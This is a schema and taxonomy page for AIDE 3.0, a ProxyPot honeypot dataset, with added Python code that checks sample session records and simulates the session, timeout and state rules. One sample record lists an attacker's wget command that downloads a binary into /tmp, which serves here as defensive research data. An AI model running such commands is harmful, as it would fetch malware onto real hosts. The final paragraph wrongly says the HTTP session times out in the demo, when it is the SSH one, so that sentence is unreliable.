Taxonomy
Overview
AIDE 3.0 is a real-time attack traffic collection system utilizing ProxyPot honeypots. The system ingests data into OpenSearch for advanced analytics. With 197 distributed sensors across 25 countries, it captures attacker-sensor interactions across multiple protocols (in both IPv4 and IPv6):
- FTP
- HTTP
- HTTPS
- SSH
- SFTP
- Telnet
Data Schema
Core Fields
| Field | Description |
|---|---|
| _id | Unique document identifier |
| _index | Document index name |
| @timestamp | Event recording time (ISO8601 UTC) |
| session | Unique session identifier |
| sessionLength | Session duration (endTime - startTime) |
| startTime | Session start timestamp |
| endTime | Session end timestamp |
| protocol | Communication protocol used |
| sessionTimeout | Whether the session timed out |
Client (Intruder) Information
| Field | Description |
|---|---|
| clientVersion | Client software version |
| clientIP | Intruder IP address |
| clientPort | Intruder source port |
Client Geolocation (clientGeo)
| Field | Description |
|---|---|
| as_org | Organization associated with IP |
| asn | Autonomous System Number |
| city_name | City location |
| country_name | Country name |
| country_code2 | Two-letter country code |
| country_code3 | Three-letter country code |
| dma_code | Designated Market Area code |
| ip | IP address |
| latitude | Location latitude |
| longitude | Location longitude |
| timezone | IP timezone |
Host (Sensor) Information
| Field | Description |
|---|---|
| hostIP | Sensor IP address |
| hostPort | Sensor destination port |
| hostName | ProxyPot device/emulation name |
Host Geolocation (hostGeo)
Contains the same fields as clientGeo, but describing the sensor's location.
Authentication Data
| Field | Description |
|---|---|
| credentials | Failed login attempts (usernames/passwords) |
| loggedIn | Successful login credentials |
| allUserNames | All attempted usernames |
| allUserPasswords | All attempted passwords |
Intrusion Details
| Field | Description |
|---|---|
| category | Session classification (Scan/Attempt/Intrusion) |
| allCommands | All executed commands |
| commands | Fully emulated Unix commands |
| unknownCommands | Non-emulated command attempts |
| urls | Accessed URLs |
| hashes | Downloaded malware file hashes |
| virustotal | VirusTotal analysis results |
| virustotalDominantResults | Representative VirusTotal detections |
URL Parsing (urlsParsed)
| Field | Description |
|---|---|
| original | Complete URL |
| hostname | URL hostname |
| path | URL path |
| port | URL port |
HTTP/HTTPS Data
| Field | Description |
|---|---|
| httpRequests.body | Request body |
| httpRequests.cookies | Request cookies |
| httpRequests.headers | Request headers |
| httpRequests.method | HTTP method |
| httpRequests.status | Response status code |
| httpRequests.uris | Requested URIs |
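The following is an added example of how a consumer of this schema would sanity-check exported records and summarize them per attacker before querying OpenSearch for more. It is not code from the AIDE or ProxyPot project. The three records in SAMPLE_DOCS are constructed to follow the field names above; their values are illustrative. Assumptions that the page does not state: timestamps are ISO 8601 UTC, sessionLength is measured in seconds, allUserNames is a list of strings, and a URL without an explicit port takes the scheme's default port in urlsParsed.

```python
"""Consistency checks and a per-source summary over AIDE 3.0 style records.

Added example, not code from the AIDE / ProxyPot project. SAMPLE_DOCS is a
constructed set of three records that follows the field names in the schema
above; the values are illustrative. Assumptions not stated on the page:
timestamps are ISO 8601 UTC, sessionLength is in seconds, allUserNames is a
list of strings, and a URL without an explicit port gets the scheme default.
"""
from collections import defaultdict
from datetime import datetime, timezone
from urllib.parse import urlsplit

SESSION_TIMEOUT_S = 60      # from "A Note on Session, Timeout and State"
CLOCK_TOLERANCE_S = 1.0     # assumption: tolerate 1 s of skew between fields

SAMPLE_DOCS = [  # constructed sample records, not real sensor data
    {
        "_id": "doc-1", "session": "1704947a-ca84-4df9-a560-f3bf4cc31d47",
        "protocol": "ssh", "category": "Intrusion",
        "startTime": "2024-01-11T03:12:40Z", "endTime": "2024-01-11T03:12:52Z",
        "sessionLength": 12, "sessionTimeout": False,
        "clientIP": "198.51.100.23", "hostPort": 22,
        "allUserNames": ["admin", "root"],
        "loggedIn": {"username": "root", "password": "toor"},
        "allCommands": ["uname -a", "wget http://203.0.113.9:8080/x86 -O /tmp/x86"],
        "urls": ["http://203.0.113.9:8080/x86"],
        "hashes": ["d41d8cd98f00b204e9800998ecf8427e"],   # placeholder hash
    },
    {
        "_id": "doc-2", "session": "6a0c1d52-7b3e-4f9a-9c21-0e5d8a7b4c3f",
        "protocol": "http", "category": "Scan",
        "startTime": "2024-01-11T03:20:00Z", "endTime": "2024-01-11T03:21:00Z",
        "sessionLength": 60, "sessionTimeout": True,
        "clientIP": "198.51.100.23", "hostPort": 80,
        "allUserNames": [], "loggedIn": None,
        "allCommands": [], "urls": [], "hashes": [],
    },
    {
        "_id": "doc-3", "session": "f3a9e2b7-1c4d-4e8f-a6b5-2d7c9e0f1a3b",
        "protocol": "telnet", "category": "Attempt",
        "startTime": "2024-01-11T04:00:00Z", "endTime": "2024-01-11T04:01:15Z",
        "sessionLength": 75, "sessionTimeout": False,   # deliberately inconsistent
        "clientIP": "203.0.113.77", "hostPort": 23,
        "allUserNames": ["admin", "support"], "loggedIn": None,
        "allCommands": [], "urls": [], "hashes": [],
    },
]


def parse_ts(value):
    """Parse the ISO 8601 UTC timestamps used by @timestamp, startTime and endTime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")).astimezone(timezone.utc)


def parse_url(url):
    """Rebuild the urlsParsed sub-document (original/hostname/path/port) from a raw URL.
    Assumption: a URL with no explicit port falls back to the scheme's default port."""
    parts = urlsplit(url)
    port = parts.port or {"http": 80, "https": 443, "ftp": 21}.get(parts.scheme)
    return {"original": url, "hostname": parts.hostname,
            "path": parts.path or "/", "port": port}


def check_session(doc):
    """Return a list of consistency problems for one record (empty when it is clean).

    The checks follow the session/timeout rules on this page: sessionLength must
    equal endTime - startTime, and sessionTimeout must agree with the 60 s limit.
    """
    issues = []
    length = (parse_ts(doc["endTime"]) - parse_ts(doc["startTime"])).total_seconds()
    if abs(length - doc["sessionLength"]) > CLOCK_TOLERANCE_S:
        issues.append(f"sessionLength {doc['sessionLength']} != endTime-startTime {length:.0f}")
    if doc["sessionTimeout"] and length < SESSION_TIMEOUT_S - CLOCK_TOLERANCE_S:
        issues.append("sessionTimeout set but the session is shorter than the 60 s limit")
    if not doc["sessionTimeout"] and length > SESSION_TIMEOUT_S + CLOCK_TOLERANCE_S:
        issues.append("session longer than the 60 s limit but sessionTimeout not set")
    return issues


def summarize_by_source(docs):
    """Group records by clientIP: sessions, category counts, protocols, usernames, hashes."""
    out = defaultdict(lambda: {"sessions": set(), "categories": defaultdict(int),
                               "protocols": set(), "usernames": set(), "hashes": set()})
    for d in docs:
        s = out[d["clientIP"]]
        s["sessions"].add(d["session"])
        s["categories"][d["category"]] += 1
        s["protocols"].add(d["protocol"])
        s["usernames"].update(d.get("allUserNames") or [])
        if d.get("loggedIn"):
            s["usernames"].add(d["loggedIn"]["username"])
        s["hashes"].update(d.get("hashes") or [])
    return dict(out)


if __name__ == "__main__":
    for doc in SAMPLE_DOCS:
        print(doc["_id"], check_session(doc) or "ok")
    for ip, s in summarize_by_source(SAMPLE_DOCS).items():
        print(ip, dict(s["categories"]), sorted(s["protocols"]), sorted(s["usernames"]))
```

Running the block flags doc-3 (75 s long with sessionTimeout false) and leaves the other two clean; the summary shows the first source hitting both SSH and HTTP from one IP, which is the kind of cross-protocol view the clientIP field is meant to support.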
Supported Emulations
FTP
Full Command Support
ADAT, ALLO, APPE, AUTH, CDUP, CWD, CCC, CONF, CLNT, DELE, ENC, EPRT, EPSV, FEAT, LIST, LPRT, NLST, MDTM, MIC, MLSD, MKD,
MODE, NOOP, OPTS, PASS, PBSZ, PORT, PROT, PWD, QUIT, RETR, REST, RNFR, RNTO, RMD, SIZE, STAT, STOR, STRU, SYST, TYPE,
USER, XCUP, XCWD, XMKD, XPWD, XRMD
HTTP/HTTPS
- Apache Debian 2.4.62 (Basic HTTP server)
- WordPress 6.2.2 (Frontend)
SSH/Telnet (Debian 12)
Full Command Support
cd, chmod, chown, cp, curl, df, echo, export, hexdump, id, iptables, ip6tables, ls, lsblk, mkdir, mv, netplan, pwd, rm,
sleep, tail, touch, uname, unset, wc, wget, whoami
Partial Command Support
apt, apt-get, busybox, chattr, crontab
A Note on Session, Timeout and State
This note explains what a session is, how the timeout behaves, and how state is tied to sessions. It is intended for users studying unwanted traffic such as attempts and intrusions: the design makes it possible to track multiple sessions consistently while also presenting intruders with more realistic system behavior.
Session
session : a unique identifier (ex. "1704947a-ca84-4df9-a560-f3bf4cc31d47") grouping activity from an attacker across connections. It starts with the first connection and persists until every connection closes or a timeout occurs. For non-persistent protocols (ex. HTTP or FTP), connections from the same attacker IP are tracked under one session ID. For SSH and Telnet, each real connection gets its own session ID, even when it comes from the same attacker IP. All activity is fully monitored and tracked until termination.
Timeout
sessionTimeout : a boolean (ex. false) indicating whether the session ended due to a timeout (true) or completed naturally (false). The timeout is set at 60 seconds from the initial connection (startTime). If this limit is exceeded, the session's connections are terminated and sessionTimeout is set to true. If all connections end within 60 seconds, it remains false.
State and Session Relationship
state : a unique identifier (ex. "13c4b378-1f26-4f57-bb32-eb67a21769fb") tied to the emulated filesystem during the session. State is preserved for 3 hours. If the same attacker (ex. IP "127.0.0.1" and protocol "ssh") reconnects within this period, they encounter the system as they left it, sharing the same state across all their connections. For non-persistent protocols this keeps the system consistent across the multiple connections within a session. For SSH and Telnet, where each connection is a separate session with its own ID, it ties those sessions to the same state for 3 hours, keyed on the attacker's IP and protocol.
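To make the three rules above concrete, here is an added simulation of the session, timeout and state bookkeeping as this note describes it. It is not ProxyPot code and does not reproduce its internals; it only models the documented behavior so a reader can see which connections end up with the same session ID and which share a state ID. Two details the page leaves open are taken as assumptions: the 3 hour state lifetime is measured from the last connection that used the state, and for a non-persistent protocol a connection that arrives after the previous session from that IP has closed starts a new session. The connection timeline in run_demo is constructed.

```python
"""Simulation of the session / timeout / state rules described in this note.

Added example, not ProxyPot code. Assumptions not stated on the page: the
3 hour state lifetime counts from the last connection that used the state,
and for non-persistent protocols a connection arriving after the previous
session from the same IP closed starts a new session.
"""
import uuid
from dataclasses import dataclass, field
from typing import Optional

SESSION_TIMEOUT_S = 60                  # sessionTimeout limit, from startTime
STATE_TTL_S = 3 * 3600                  # state is preserved for 3 hours
PER_CONNECTION_SESSION = {"ssh", "telnet"}   # one session ID per real connection


@dataclass
class Session:
    session: str                        # the "session" field of the record
    start_time: float                   # startTime
    connections: set = field(default_factory=set)
    end_time: Optional[float] = None    # endTime once finished
    session_timeout: bool = False       # sessionTimeout

    def length(self):
        """sessionLength = endTime - startTime."""
        return self.end_time - self.start_time


class ProxyPotSessions:
    def __init__(self):
        self.open = {}       # session key -> Session; key is (ip, proto) or the conn id
        self.closed = []     # finished Session records, in closing order
        self.states = {}     # (ip, proto) -> (state id, last time it was used)
        self.conn_key = {}   # conn id -> key of the session it belongs to

    def _state_for(self, now, ip, proto):
        """Reuse the (ip, proto) state if it was used within STATE_TTL_S, else mint a new one."""
        entry = self.states.get((ip, proto))
        if entry is None or now - entry[1] > STATE_TTL_S:
            entry = (str(uuid.uuid4()), now)
        self.states[(ip, proto)] = (entry[0], now)   # refresh last-used time (assumption)
        return entry[0]

    def connect(self, now, ip, proto, conn_id):
        """Register a new connection; return the (session, state) IDs it is assigned."""
        self.expire(now)
        state = self._state_for(now, ip, proto)
        # SSH/Telnet: every connection is its own session. Others: keyed by attacker IP.
        key = conn_id if proto in PER_CONNECTION_SESSION else (ip, proto)
        sess = self.open.get(key)
        if sess is None:
            sess = Session(str(uuid.uuid4()), now)
            self.open[key] = sess
        sess.connections.add(conn_id)
        self.conn_key[conn_id] = key
        return sess.session, state

    def disconnect(self, now, conn_id):
        """Close a connection; the session ends naturally when its last connection closes."""
        self.expire(now)
        key = self.conn_key.pop(conn_id, None)
        if key is None:
            return                      # already terminated by the timeout
        sess = self.open[key]
        sess.connections.discard(conn_id)
        if not sess.connections:
            self._finish(sess, key, now, timed_out=False)

    def expire(self, now):
        """Terminate every session that has lived SESSION_TIMEOUT_S since startTime."""
        for key, sess in list(self.open.items()):
            if now - sess.start_time >= SESSION_TIMEOUT_S:
                for c in sess.connections:
                    self.conn_key.pop(c, None)
                self._finish(sess, key, sess.start_time + SESSION_TIMEOUT_S, timed_out=True)

    def _finish(self, sess, key, end_time, timed_out):
        sess.end_time = end_time
        sess.session_timeout = timed_out
        del self.open[key]
        self.closed.append(sess)


def run_demo():
    """Constructed timeline (times in seconds); returns what each connection was assigned."""
    t = ProxyPotSessions()
    ip = "198.51.100.23"
    out = {}
    out["http_c1"] = t.connect(0, ip, "http", "c1")
    out["http_c2"] = t.connect(5, ip, "http", "c2")    # same IP, HTTP: joins c1's session
    t.disconnect(10, "c1")
    t.disconnect(20, "c2")                              # last connection closes: ends naturally
    out["ssh_c3"] = t.connect(30, ip, "ssh", "c3")
    out["ssh_c4"] = t.connect(35, ip, "ssh", "c4")      # SSH: own session, shares c3's state
    t.disconnect(50, "c4")
    t.expire(100)                                       # c3 never closed: cut off at 30 + 60 s
    out["ssh_c5"] = t.connect(2000, ip, "ssh", "c5")    # within 3 h: same filesystem state
    t.disconnect(2010, "c5")
    out["ssh_c6"] = t.connect(13000, ip, "ssh", "c6")   # > 3 h after c5: fresh state
    t.disconnect(13005, "c6")
    out["closed"] = t.closed
    return out


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(name, value)
```

The two rules that most often surprise people analysing this data are visible in the demo: the two SSH connections from one IP five seconds apart produce two different session values but the same state value, and the HTTP session that nobody closed ends with sessionTimeout true and an endTime exactly 60 seconds after startTime, not at the moment the sensor noticed.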